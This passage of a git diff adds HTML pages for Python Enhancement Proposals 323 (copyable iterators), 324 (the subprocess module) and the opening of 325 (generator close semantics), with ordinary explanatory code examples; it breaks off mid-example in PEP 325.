Given this existing situation, copy.copy(it) on some iterator object +isn’t very useful, nor, therefore, is it at all widely used. However, +there are many cases in which being able to get a “snapshot” of an +iterator, as a “bookmark”, so as to be able to keep iterating along +the sequence but later iterate again on the same sequence from the +bookmark onwards, is useful. To support such “bookmarking”, module +itertools, in 2.4, has grown a ‘tee’ function, to be used as:

+
it, bookmark = itertools.tee(it)
+
+
+

The previous value of ‘it’ must not be used again, which is why this +typical usage idiom rebinds the name. After this call, ‘it’ and +‘bookmark’ are independently-iterable iterators on the same underlying +sequence as the original value of ‘it’: this satisfies application +needs for “iterator copying”.

+

However, when itertools.tee can make no hypotheses about the nature of +the iterator it is passed as an argument, it must save in memory all +items through which one of the two ‘teed’ iterators, but not yet both, +have stepped. This can be quite costly in terms of memory, if the two +iterators get very far from each other in their stepping; indeed, in +some cases it may be preferable to make a list from the iterator so as +to be able to step repeatedly through the subsequence, or, if that is +too costy in terms of memory, save items to disk, again in order to be +able to iterate through them repeatedly.

+

This PEP proposes another idea that will, in some important cases, +allow itertools.tee to do its job with minimal cost in terms of +memory; user code may also occasionally be able to exploit the idea in +order to decide whether to copy an iterator, make a list from it, or +use an auxiliary disk file.

+

The key consideration is that some important iterators, such as those +which built-in function iter builds over sequences, would be +intrinsically easy to copy: just get another reference to the same +sequence, and a copy of the integer index. However, in Python 2.3, +those iterators don’t expose the state, and don’t support copy.copy.

+

The purpose of this PEP, therefore, is to have those iterator types +expose a suitable __copy__ method. Similarly, user-coded iterator +types that can provide copies of their instances, suitable for +separate and independent iteration, with limited costs in time and +space, should also expose a suitable __copy__ method. While +copy.copy also supports other ways to let a type control the way +its instances are copied, it is suggested, for simplicity, that +iterator types that support copying always do so by exposing a +__copy__ method, and not in the other ways copy.copy supports.

+

Having iterators expose a suitable __copy__ when feasible will afford +easy optimization of itertools.tee and similar user code, as in:

+
def tee(it):
+    it = iter(it)
+    try: copier = it.__copy__
+    except AttributeError:
+        # non-copyable iterator, do all the needed hard work
+        # [snipped!]
+    else:
+        return it, copier()
+
+
+

Note that this function does NOT call “copy.copy(it)”, which (even +after this PEP is implemented) might well still “just happen to +succeed”. for some iterator type that is implemented as a user-coded +class. without really supplying an adequate “independently iterable” +copy object as its result.

+
+
+

Specification

+

Any iterator type X may expose a method __copy__ that is callable +without arguments on any instance x of X. The method should be +exposed if and only if the iterator type can provide copyability with +reasonably little computational and memory effort. Furthermore, the +new object y returned by method __copy__ should be a new instance +of X that is iterable independently and separately from x, stepping +along the same “underlying sequence” of items.

+

For example, suppose a class Iter essentially duplicated the +functionality of the iter builtin for iterating on a sequence:

+
class Iter(object):
+
+    def __init__(self, sequence):
+        self.sequence = sequence
+        self.index = 0
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        try: result = self.sequence[self.index]
+        except IndexError: raise StopIteration
+        self.index += 1
+        return result
+
+
+

To make this Iter class compliant with this PEP, the following +addition to the body of class Iter would suffice:

+
def __copy__(self):
+    result = self.__class__(self.sequence)
+    result.index = self.index
+    return result
+
+
+

Note that __copy__, in this case, does not even try to copy the +sequence; if the sequence is altered while either or both of the +original and copied iterators are still stepping on it, the iteration +behavior is quite likely to go awry anyway – it is not __copy__’s +responsibility to change this normal Python behavior for iterators +which iterate on mutable sequences (that might, perhaps, be the +specification for a __deepcopy__ method of iterators, which, however, +this PEP does not deal with).

+

Consider also a “random iterator”, which provides a nonterminating +sequence of results from some method of a random instance, called +with given arguments:

+
class RandomIterator(object):
+
+    def __init__(self, bound_method, *args):
+        self.call = bound_method
+        self.args = args
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        return self.call(*self.args)
+
+    def __copy__(self):
+        import copy, new
+        im_self = copy.copy(self.call.im_self)
+        method = new.instancemethod(self.call.im_func, im_self)
+        return self.__class__(method, *self.args)
+
+
+

This iterator type is slightly more general than its name implies, as +it supports calls to any bound method (or other callable, but if the +callable is not a bound method, then method __copy__ will fail). But +the use case is for the purpose of generating random streams, as in:

+
import random
+
+def show5(it):
+    for i, result in enumerate(it):
+        print '%6.3f'%result,
+        if i==4: break
+    print
+
+normit = RandomIterator(random.Random().gauss, 0, 1)
+show5(normit)
+copit = normit.__copy__()
+show5(normit)
+show5(copit)
+
+
+

which will display some output such as:

+
-0.536  1.936 -1.182 -1.690 -1.184
+ 0.666 -0.701  1.214  0.348  1.373
+ 0.666 -0.701  1.214  0.348  1.373
+
+
+

the key point being that the second and third lines are equal, because +the normit and copit iterators will step along the same “underlying +sequence”. (As an aside, note that to get a copy of self.call.im_self +we must use copy.copy, NOT try getting at a __copy__ method directly, +because for example instances of random.Random support copying via +__getstate__ and __setstate__, NOT via __copy__; indeed, using +copy.copy is the normal way to get a shallow copy of any object – +copyable iterators are different because of the already-mentioned +uncertainty about the result of copy.copy supporting these “copyable +iterator” specs).

+
+
+

Details

+

Besides adding to the Python docs a recommendation that user-coded +iterator types support a __copy__ method (if and only if it can be +implemented with small costs in memory and runtime, and produce an +independently-iterable copy of an iterator object), this PEP’s +implementation will specifically include the addition of copyability +to the iterators over sequences that built-in iter returns, and also +to the iterators over a dictionary returned by the methods __iter__, +iterkeys, itervalues, and iteritems of built-in type dict.

+

Iterators produced by generator functions will not be copyable. +However, iterators produced by the new “generator expressions” of +Python 2.4 (PEP 289) should be copyable if their underlying +iterator[s] are; the strict limitations on what is possible in a +generator expression, compared to the much vaster generality of a +generator, should make that feasible. Similarly, the iterators +produced by the built-in function enumerate, and certain functions +suppiled by module itertools, should be copyable if the underlying +iterators are.

+

The implementation of this PEP will also include the optimization of +the new itertools.tee function mentioned in the Motivation section.

+
+
+

Rationale

+

The main use case for (shallow) copying of an iterator is the same as +for the function itertools.tee (new in 2.4). User code will not +directly attempt to copy an iterator, because it would have to deal +separately with uncopyable cases; calling itertools.tee will +internally perform the copy when appropriate, and implicitly fallback +to a maximally efficient non-copying strategy for iterators that are +not copyable. (Occasionally, user code may want more direct control, +specifically in order to deal with non-copyable iterators by other +strategies, such as making a list or saving the sequence to disk).

+

A tee’d iterator may serve as a “reference point”, allowing processing +of a sequence to continue or resume from a known point, while the +other independent iterator can be freely advanced to “explore” a +further part of the sequence as needed. A simple example: a generator +function which, given an iterator of numbers (assumed to be positive), +returns a corresponding iterator, each of whose items is the fraction +of the total corresponding to each corresponding item of the input +iterator. The caller may pass the total as a value, if known in +advance; otherwise, the iterator returned by calling this generator +function will first compute the total.

+
def fractions(numbers, total=None):
+    if total is None:
+        numbers, aux = itertools.tee(numbers)
+        total = sum(aux)
+    total = float(total)
+    for item in numbers:
+        yield item / total
+
+
+

The ability to tee the numbers iterator allows this generator to +precompute the total, if needed, without necessarily requiring +O(N) auxiliary memory if the numbers iterator is copyable.

+

As another example of “iterator bookmarking”, consider a stream of +numbers with an occasional string as a “postfix operator” now and +then. By far most frequent such operator is a ‘+’, whereupon we must +sum all previous numbers (since the last previous operator if any, or +else since the start) and yield the result. Sometimes we find a ‘*’ +instead, which is the same except that the previous numbers must +instead be multiplied, not summed.

+
def filter_weird_stream(stream):
+    it = iter(stream)
+    while True:
+        it, bookmark = itertools.tee(it)
+        total = 0
+        for item in it:
+            if item=='+':
+                yield total
+                break
+            elif item=='*':
+                product = 1
+                for item in bookmark:
+                    if item=='*':
+                        yield product
+                        break
+                    else:
+                        product *= item
+           else:
+               total += item
+
+
+

Similar use cases of itertools.tee can support such tasks as +“undo” on a stream of commands represented by an iterator, +“backtracking” on the parse of a stream of tokens, and so on. +(Of course, in each case, one should also consider simpler +possibilities such as saving relevant portions of the sequence +into lists while stepping on the sequence with just one iterator, +depending on the details of one’s task).

+

Here is an example, in pure Python, of how the ‘enumerate’ +built-in could be extended to support __copy__ if its underlying +iterator also supported __copy__:

+
class enumerate(object):
+
+    def __init__(self, it):
+        self.it = iter(it)
+        self.i = -1
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        self.i += 1
+        return self.i, self.it.next()
+
+    def __copy__(self):
+        result = self.__class__.__new__()
+        result.it = self.it.__copy__()
+        result.i = self.i
+        return result
+
+
+

Here is an example of the kind of “fragility” produced by “accidental +copyability” of an iterator – the reason why one must NOT use +copy.copy expecting, if it succeeds, to receive as a result an +iterator which is iterable-on independently from the original. Here +is an iterator class that iterates (in preorder) on “trees” which, for +simplicity, are just nested lists – any item that’s a list is treated +as a subtree, any other item as a leaf.

+
class ListreeIter(object):
+
+    def __init__(self, tree):
+        self.tree = [tree]
+        self.indx = [-1]
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        if not self.indx:
+            raise StopIteration
+        self.indx[-1] += 1
+        try:
+            result = self.tree[-1][self.indx[-1]]
+        except IndexError:
+            self.tree.pop()
+            self.indx.pop()
+            return self.next()
+        if type(result) is not list:
+            return result
+        self.tree.append(result)
+        self.indx.append(-1)
+        return self.next()
+
+
+

Now, for example, the following code:

+
import copy
+x = [ [1,2,3], [4, 5, [6, 7, 8], 9], 10, 11, [12] ]
+
+print 'showing all items:',
+it = ListreeIter(x)
+for i in it:
+    print i,
+    if i==6: cop = copy.copy(it)
+print
+
+print 'showing items >6 again:'
+for i in cop: print i,
+print
+
+
+

does NOT work as intended – the “cop” iterator gets consumed, and +exhausted, step by step as the original “it” iterator is, because +the accidental (rather than deliberate) copying performed by +copy.copy shares, rather than duplicating the “index” list, which +is the mutable attribute it.indx (a list of numerical indices). +Thus, this “client code” of the iterator, which attempts to iterate +twice over a portion of the sequence via a copy.copy on the +iterator, is NOT correct.

+

Some correct solutions include using itertools.tee, i.e., changing +the first for loop into:

+
for i in it:
+    print i,
+    if i==6:
+        it, cop = itertools.tee(it)
+        break
+for i in it: print i,
+
+
+

(note that we MUST break the loop in two, otherwise we’d still +be looping on the ORIGINAL value of it, which must NOT be used +further after the call to tee!!!); or making a list, i.e.

+
for i in it:
+    print i,
+    if i==6:
+        cop = lit = list(it)
+        break
+for i in lit: print i,
+
+
+

(again, the loop must be broken in two, since iterator ‘it’ +gets exhausted by the call list(it)).

+

Finally, all of these solutions would work if Listiter supplied +a suitable __copy__ method, as this PEP recommends:

+
def __copy__(self):
+    result = self.__class__.new()
+    result.tree = copy.copy(self.tree)
+    result.indx = copy.copy(self.indx)
+    return result
+
+
+

There is no need to get any “deeper” in the copy, but the two +mutable “index state” attributes must indeed be copied in order +to achieve a “proper” (independently iterable) iterator-copy.

+

The recommended solution is to have class Listiter supply this +__copy__ method AND have client code use itertools.tee (with +the split-in-two-parts loop as shown above). This will make +client code maximally tolerant of different iterator types it +might be using AND achieve good performance for tee’ing of this +specific iterator type at the same time.

+
+
+

References

+

[1] Discussion on python-dev starting at post: + https://mail.python.org/pipermail/python-dev/2003-October/038969.html

+

[2] Online documentation for the copy module of the standard library: + https://docs.python.org/release/2.6/library/copy.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0323.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0324/index.html b/pep-0324/index.html new file mode 100644 index 00000000000..1df898c4146 --- /dev/null +++ b/pep-0324/index.html @@ -0,0 +1,644 @@ + + + + + + + + PEP 324 – subprocess - New process module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 324 – subprocess - New process module

+
+
Author:
+
Peter Astrand <astrand at lysator.liu.se>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Nov-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a new module for starting and communicating +with processes.

+
+
+

Motivation

+

Starting new processes is a common task in any programming +language, and very common in a high-level language like Python. +Good support for this task is needed, because:

+
    +
  • Inappropriate functions for starting processes could mean a +security risk: If the program is started through the shell, and +the arguments contain shell meta characters, the result can be +disastrous. [1]
  • +
  • It makes Python an even better replacement language for +over-complicated shell scripts.
  • +
+

Currently, Python has a large number of different functions for +process creation. This makes it hard for developers to choose.

+

The subprocess module provides the following enhancements over +previous functions:

+
    +
  • One “unified” module provides all functionality from previous +functions.
  • +
  • Cross-process exceptions: Exceptions happening in the child +before the new process has started to execute are re-raised in +the parent. This means that it’s easy to handle exec() +failures, for example. With popen2, for example, it’s +impossible to detect if the execution failed.
  • +
  • A hook for executing custom code between fork and exec. This +can be used for, for example, changing uid.
  • +
  • No implicit call of /bin/sh. This means that there is no need +for escaping dangerous shell meta characters.
  • +
  • All combinations of file descriptor redirection is possible. +For example, the “python-dialog” [2] needs to spawn a process +and redirect stderr, but not stdout. This is not possible with +current functions, without using temporary files.
  • +
  • With the subprocess module, it’s possible to control if all open +file descriptors should be closed before the new program is +executed.
  • +
  • Support for connecting several subprocesses (shell “pipe”).
  • +
  • Universal newline support.
  • +
  • A communicate() method, which makes it easy to send stdin data +and read stdout and stderr data, without risking deadlocks. +Most people are aware of the flow control issues involved with +child process communication, but not all have the patience or +skills to write a fully correct and deadlock-free select loop. +This means that many Python applications contain race +conditions. A communicate() method in the standard library +solves this problem.
  • +
+
+
+

Rationale

+

The following points summarizes the design:

+
    +
  • subprocess was based on popen2, which is tried-and-tested.
  • +
  • The factory functions in popen2 have been removed, because I +consider the class constructor equally easy to work with.
  • +
  • popen2 contains several factory functions and classes for +different combinations of redirection. subprocess, however, +contains one single class. Since the subprocess module supports +12 different combinations of redirection, providing a class or +function for each of them would be cumbersome and not very +intuitive. Even with popen2, this is a readability problem. +For example, many people cannot tell the difference between +popen2.popen2 and popen2.popen4 without using the documentation.
  • +
  • One small utility function is provided: subprocess.call(). It +aims to be an enhancement over os.system(), while still very +easy to use:
      +
    • It does not use the Standard C function system(), which has +limitations.
    • +
    • It does not call the shell implicitly.
    • +
    • No need for quoting; using an argument list.
    • +
    • The return value is easier to work with.
    • +
    +

    The call() utility function accepts an ‘args’ argument, just +like the Popen class constructor. It waits for the command to +complete, then returns the returncode attribute. The +implementation is very simple:

    +
    def call(*args, **kwargs):
    +    return Popen(*args, **kwargs).wait()
    +
    +
    +

    The motivation behind the call() function is simple: Starting a +process and wait for it to finish is a common task.

    +

    While Popen supports a wide range of options, many users have +simple needs. Many people are using os.system() today, mainly +because it provides a simple interface. Consider this example:

    +
    os.system("stty sane -F " + device)
    +
    +
    +

    With subprocess.call(), this would look like:

    +
    subprocess.call(["stty", "sane", "-F", device])
    +
    +
    +

    or, if executing through the shell:

    +
    subprocess.call("stty sane -F " + device, shell=True)
    +
    +
    +
  • +
  • The “preexec” functionality makes it possible to run arbitrary +code between fork and exec. One might ask why there are special +arguments for setting the environment and current directory, but +not for, for example, setting the uid. The answer is:
      +
    • Changing environment and working directory is considered +fairly common.
    • +
    • Old functions like spawn() has support for an +“env”-argument.
    • +
    • env and cwd are considered quite cross-platform: They make +sense even on Windows.
    • +
    +
  • +
  • On POSIX platforms, no extension module is required: the module +uses os.fork(), os.execvp() etc.
  • +
  • On Windows platforms, the module requires either Mark Hammond’s +Windows extensions [5], or a small extension module called +_subprocess.
  • +
+
+
+

Specification

+

This module defines one class called Popen:

+
class Popen(args, bufsize=0, executable=None,
+            stdin=None, stdout=None, stderr=None,
+            preexec_fn=None, close_fds=False, shell=False,
+            cwd=None, env=None, universal_newlines=False,
+            startupinfo=None, creationflags=0):
+
+
+

Arguments are:

+
    +
  • args should be a string, or a sequence of program arguments. +The program to execute is normally the first item in the args +sequence or string, but can be explicitly set by using the +executable argument.

    On UNIX, with shell=False (default): In this case, the Popen +class uses os.execvp() to execute the child program. args +should normally be a sequence. A string will be treated as a +sequence with the string as the only item (the program to +execute).

    +

    On UNIX, with shell=True: If args is a string, it specifies the +command string to execute through the shell. If args is a +sequence, the first item specifies the command string, and any +additional items will be treated as additional shell arguments.

    +

    On Windows: the Popen class uses CreateProcess() to execute the +child program, which operates on strings. If args is a +sequence, it will be converted to a string using the +list2cmdline method. Please note that not all MS Windows +applications interpret the command line the same way: The +list2cmdline is designed for applications using the same rules +as the MS C runtime.

    +
  • +
  • bufsize, if given, has the same meaning as the corresponding +argument to the built-in open() function: 0 means unbuffered, 1 +means line buffered, any other positive value means use a buffer +of (approximately) that size. A negative bufsize means to use +the system default, which usually means fully buffered. The +default value for bufsize is 0 (unbuffered).
  • +
  • stdin, stdout and stderr specify the executed programs’ standard +input, standard output and standard error file handles, +respectively. Valid values are PIPE, an existing file +descriptor (a positive integer), an existing file object, and +None. PIPE indicates that a new pipe to the child should be +created. With None, no redirection will occur; the child’s file +handles will be inherited from the parent. Additionally, stderr +can be STDOUT, which indicates that the stderr data from the +applications should be captured into the same file handle as for +stdout.
  • +
  • If preexec_fn is set to a callable object, this object will be +called in the child process just before the child is executed.
  • +
  • If close_fds is true, all file descriptors except 0, 1 and 2 +will be closed before the child process is executed.
  • +
  • If shell is true, the specified command will be executed through +the shell.
  • +
  • If cwd is not None, the current directory will be changed to cwd +before the child is executed.
  • +
  • If env is not None, it defines the environment variables for the +new process.
  • +
  • If universal_newlines is true, the file objects stdout and +stderr are opened as a text file, but lines may be terminated +by any of \n, the Unix end-of-line convention, \r, the +Macintosh convention or \r\n, the Windows convention. All of +these external representations are seen as \n by the Python +program. Note: This feature is only available if Python is +built with universal newline support (the default). Also, the +newlines attribute of the file objects stdout, stdin and stderr +are not updated by the communicate() method.
  • +
  • The startupinfo and creationflags, if given, will be passed to +the underlying CreateProcess() function. They can specify +things such as appearance of the main window and priority for +the new process. (Windows only)
  • +
+

This module also defines two shortcut functions:

+
    +
  • +
    call(*args, **kwargs):
    Run command with arguments. Wait for command to complete, +then return the returncode attribute.

    The arguments are the same as for the Popen constructor. +Example:

    +
    retcode = call(["ls", "-l"])
    +
    +
    +
    +
    +
  • +
+
+

Exceptions

+

Exceptions raised in the child process, before the new program has +started to execute, will be re-raised in the parent. +Additionally, the exception object will have one extra attribute +called ‘child_traceback’, which is a string containing traceback +information from the child’s point of view.

+

The most common exception raised is OSError. This occurs, for +example, when trying to execute a non-existent file. Applications +should prepare for OSErrors.

+

A ValueError will be raised if Popen is called with invalid +arguments.

+
+
+

Security

+

Unlike some other popen functions, this implementation will never +call /bin/sh implicitly. This means that all characters, +including shell meta-characters, can safely be passed to child +processes.

+
+
+

Popen objects

+

Instances of the Popen class have the following methods:

+
+
poll()
Check if child process has terminated. Returns returncode +attribute.
+
wait()
Wait for child process to terminate. Returns returncode +attribute.
+
communicate(input=None)
Interact with process: Send data to stdin. Read data from +stdout and stderr, until end-of-file is reached. Wait for +process to terminate. The optional stdin argument should be a +string to be sent to the child process, or None, if no data +should be sent to the child.

communicate() returns a tuple (stdout, stderr).

+

Note: The data read is buffered in memory, so do not use this +method if the data size is large or unlimited.

+
+
+

The following attributes are also available:

+
+
stdin
If the stdin argument is PIPE, this attribute is a file object +that provides input to the child process. Otherwise, it is +None.
+
stdout
If the stdout argument is PIPE, this attribute is a file +object that provides output from the child process. +Otherwise, it is None.
+
stderr
If the stderr argument is PIPE, this attribute is file object +that provides error output from the child process. Otherwise, +it is None.
+
pid
The process ID of the child process.
+
returncode
The child return code. A None value indicates that the +process hasn’t terminated yet. A negative value -N indicates +that the child was terminated by signal N (UNIX only).
+
+
+
+
+

Replacing older functions with the subprocess module

+

In this section, “a ==> b” means that b can be used as a +replacement for a.

+

Note: All functions in this section fail (more or less) silently +if the executed program cannot be found; this module raises an +OSError exception.

+

In the following examples, we assume that the subprocess module is +imported with from subprocess import *.

+
+

Replacing /bin/sh shell backquote

+
output=`mycmd myarg`
+==>
+output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0]
+
+
+
+
+

Replacing shell pipe line

+
output=`dmesg | grep hda`
+==>
+p1 = Popen(["dmesg"], stdout=PIPE)
+p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE)
+output = p2.communicate()[0]
+
+
+
+
+

Replacing os.system()

+
sts = os.system("mycmd" + " myarg")
+==>
+p = Popen("mycmd" + " myarg", shell=True)
+sts = os.waitpid(p.pid, 0)
+
+
+

Note:

+
    +
  • Calling the program through the shell is usually not required.
  • +
  • It’s easier to look at the returncode attribute than the +exit status.
  • +
+

A more real-world example would look like this:

+
try:
+    retcode = call("mycmd" + " myarg", shell=True)
+    if retcode < 0:
+        print >>sys.stderr, "Child was terminated by signal", -retcode
+    else:
+        print >>sys.stderr, "Child returned", retcode
+except OSError, e:
+    print >>sys.stderr, "Execution failed:", e
+
+
+
+
+

Replacing os.spawn*

+

P_NOWAIT example:

+
pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg")
+==>
+pid = Popen(["/bin/mycmd", "myarg"]).pid
+
+
+

P_WAIT example:

+
retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg")
+==>
+retcode = call(["/bin/mycmd", "myarg"])
+
+
+

Vector example:

+
os.spawnvp(os.P_NOWAIT, path, args)
+==>
+Popen([path] + args[1:])
+
+
+

Environment example:

+
os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env)
+==>
+Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"})
+
+
+
+
+

Replacing os.popen*

+
pipe = os.popen(cmd, mode='r', bufsize)
+==>
+pipe = Popen(cmd, shell=True, bufsize=bufsize, stdout=PIPE).stdout
+
+pipe = os.popen(cmd, mode='w', bufsize)
+==>
+pipe = Popen(cmd, shell=True, bufsize=bufsize, stdin=PIPE).stdin
+
+
+(child_stdin, child_stdout) = os.popen2(cmd, mode, bufsize)
+==>
+p = Popen(cmd, shell=True, bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, close_fds=True)
+(child_stdin, child_stdout) = (p.stdin, p.stdout)
+
+
+(child_stdin,
+ child_stdout,
+ child_stderr) = os.popen3(cmd, mode, bufsize)
+==>
+p = Popen(cmd, shell=True, bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)
+(child_stdin,
+ child_stdout,
+ child_stderr) = (p.stdin, p.stdout, p.stderr)
+
+
+(child_stdin, child_stdout_and_stderr) = os.popen4(cmd, mode, bufsize)
+==>
+p = Popen(cmd, shell=True, bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
+(child_stdin, child_stdout_and_stderr) = (p.stdin, p.stdout)
+
+
+
+
+

Replacing popen2.*

+

Note: If the cmd argument to popen2 functions is a string, the +command is executed through /bin/sh. If it is a list, the command +is directly executed.

+
(child_stdout, child_stdin) = popen2.popen2("somestring", bufsize, mode)
+==>
+p = Popen(["somestring"], shell=True, bufsize=bufsize
+          stdin=PIPE, stdout=PIPE, close_fds=True)
+(child_stdout, child_stdin) = (p.stdout, p.stdin)
+
+
+(child_stdout, child_stdin) = popen2.popen2(["mycmd", "myarg"], bufsize, mode)
+==>
+p = Popen(["mycmd", "myarg"], bufsize=bufsize,
+          stdin=PIPE, stdout=PIPE, close_fds=True)
+(child_stdout, child_stdin) = (p.stdout, p.stdin)
+
+
+

The popen2.Popen3 and popen3.Popen4 basically works as +subprocess.Popen, except that:

+
    +
  • subprocess.Popen raises an exception if the execution fails
  • +
  • the capturestderr argument is replaced with the stderr argument.
  • +
  • stdin=PIPE and stdout=PIPE must be specified.
  • +
  • popen2 closes all file descriptors by default, but you have to +specify close_fds=True with subprocess.Popen.
  • +
+
+
+
+

Open Issues

+

Some features have been requested but is not yet implemented. +This includes:

+
    +
  • Support for managing a whole flock of subprocesses
  • +
  • Support for managing “daemon” processes
  • +
  • Built-in method for killing subprocesses
  • +
+

While these are useful features, it’s expected that these can be +added later without problems.

+
    +
  • expect-like functionality, including pty support.
  • +
+

pty support is highly platform-dependent, which is a +problem. Also, there are already other modules that provide this +kind of functionality [6].

+
+
+

Backwards Compatibility

+

Since this is a new module, no major backward compatible issues +are expected. The module name “subprocess” might collide with +other, previous modules [3] with the same name, but the name +“subprocess” seems to be the best suggested name so far. The +first name of this module was “popen5”, but this name was +considered too unintuitive. For a while, the module was called +“process”, but this name is already used by Trent Mick’s +module [4].

+

The functions and modules that this new module is trying to +replace (os.system, os.spawn*, os.popen*, popen2.*, +commands.*) are expected to be available in future Python versions +for a long time, to preserve backwards compatibility.

+
+
+

Reference Implementation

+

A reference implementation is available from +http://www.lysator.liu.se/~astrand/popen5/.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0324.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0325/index.html b/pep-0325/index.html new file mode 100644 index 00000000000..65c517d058d --- /dev/null +++ b/pep-0325/index.html @@ -0,0 +1,370 @@ + + + + + + + + PEP 325 – Resource-Release Support for Generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 325 – Resource-Release Support for Generators

+
+
Author:
+
Samuele Pedroni <pedronis at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Aug-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Generators allow for natural coding and abstraction of traversal +over data. Currently if external resources needing proper timely +release are involved, generators are unfortunately not adequate. +The typical idiom for timely release is not supported, a yield +statement is not allowed in the try clause of a try-finally +statement inside a generator. The finally clause execution can be +neither guaranteed nor enforced.

+

This PEP proposes that the built-in generator type implement a +close method and destruction semantics, such that the restriction +on yield placement can be lifted, expanding the applicability of +generators.

+
+
+

Pronouncement

+

Rejected in favor of PEP 342 which includes substantially all of +the requested behavior in a more refined form.

+
+
+

Rationale

+

Python generators allow for natural coding of many data traversal +scenarios. Their instantiation produces iterators, +i.e. first-class objects abstracting traversal (with all the +advantages of first- classness). In this respect they match in +power and offer some advantages over the approach using iterator +methods taking a (smalltalkish) block. On the other hand, given +current limitations (no yield allowed in a try clause of a +try-finally inside a generator) the latter approach seems better +suited to encapsulating not only traversal but also exception +handling and proper resource acquisition and release.

+

Let’s consider an example (for simplicity, files in read-mode are +used):

+
def all_lines(index_path):
+    for path in file(index_path, "r"):
+        for line in file(path.strip(), "r"):
+            yield line
+
+
+

this is short and to the point, but the try-finally for timely +closing of the files cannot be added. (While instead of a path, a +file, whose closing then would be responsibility of the caller, +could be passed in as argument, the same is not applicable for the +files opened depending on the contents of the index).

+

If we want timely release, we have to sacrifice the simplicity and +directness of the generator-only approach: (e.g.)

+
class AllLines:
+
+     def __init__(self, index_path):
+         self.index_path = index_path
+         self.index = None
+         self.document = None
+
+     def __iter__(self):
+         self.index = file(self.index_path, "r")
+         for path in self.index:
+             self.document = file(path.strip(), "r")
+         for line in self.document:
+             yield line
+         self.document.close()
+         self.document = None
+
+     def close(self):
+         if self.index:
+             self.index.close()
+         if self.document:
+             self.document.close()
+
+
+

to be used as:

+
all_lines = AllLines("index.txt")
+try:
+    for line in all_lines:
+        ...
+finally:
+    all_lines.close()
+
+
+

The more convoluted solution implementing timely release, seems +to offer a precious hint. What we have done is encapsulate our +traversal in an object (iterator) with a close method.

+

This PEP proposes that generators should grow such a close method +with such semantics that the example could be rewritten as:

+
# Today this is not valid Python: yield is not allowed between
+# try and finally, and generator type instances support no
+# close method.
+
+def all_lines(index_path):
+    index = file(index_path, "r")
+    try:
+        for path in index:
+            document = file(path.strip(), "r")
+        try:
+            for line in document:
+                yield line
+        finally:
+            document.close()
+    finally:
+        index.close()
+
+all = all_lines("index.txt")
+try:
+    for line in all:
+        ...
+finally:
+    all.close() # close on generator
+
+
+

Currently PEP 255 disallows yield inside a try clause of a +try-finally statement, because the execution of the finally clause +cannot be guaranteed as required by try-finally semantics.

+

The semantics of the proposed close method should be such that +while the finally clause execution still cannot be guaranteed, it +can be enforced when required. Specifically, the close method +behavior should trigger the execution of the finally clauses +inside the generator, either by forcing a return in the generator +frame or by throwing an exception in it. In situations requiring +timely resource release, close could then be explicitly invoked.

+

The semantics of generator destruction on the other hand should be +extended in order to implement a best-effort policy for the +general case. Specifically, destruction should invoke close(). +The best-effort limitation comes from the fact that the +destructor’s execution is not guaranteed in the first place.

+

This seems to be a reasonable compromise, the resulting global +behavior being similar to that of files and closing.

+
+
+

Possible Semantics

+

The built-in generator type should have a close method +implemented, which can then be invoked as:

+
gen.close()
+
+
+

where gen is an instance of the built-in generator type. +Generator destruction should also invoke close method behavior.

+

If a generator is already terminated, close should be a no-op.

+

Otherwise, there are two alternative solutions, Return or +Exception Semantics:

+

A - Return Semantics: The generator should be resumed, generator +execution should continue as if the instruction at the re-entry +point is a return. Consequently, finally clauses surrounding the +re-entry point would be executed, in the case of a then allowed +try-yield-finally pattern.

+

Issues: is it important to be able to distinguish forced +termination by close, normal termination, exception propagation +from generator or generator-called code? In the normal case it +seems not, finally clauses should be there to work the same in all +these cases, still this semantics could make such a distinction +hard.

+

Except-clauses, like by a normal return, are not executed, such +clauses in legacy generators expect to be executed for exceptions +raised by the generator or by code called from it. Not executing +them in the close case seems correct.

+

B - Exception Semantics: The generator should be resumed and +execution should continue as if a special-purpose exception +(e.g. CloseGenerator) has been raised at re-entry point. Close +implementation should consume and not propagate further this +exception.

+

Issues: should StopIteration be reused for this purpose? Probably +not. We would like close to be a harmless operation for legacy +generators, which could contain code catching StopIteration to +deal with other generators/iterators.

+

In general, with exception semantics, it is unclear what to do if +the generator does not terminate or we do not receive the special +exception propagated back. Other different exceptions should +probably be propagated, but consider this possible legacy +generator code:

+
try:
+    ...
+    yield ...
+    ...
+except: # or except Exception:, etc
+    raise Exception("boom")
+
+
+

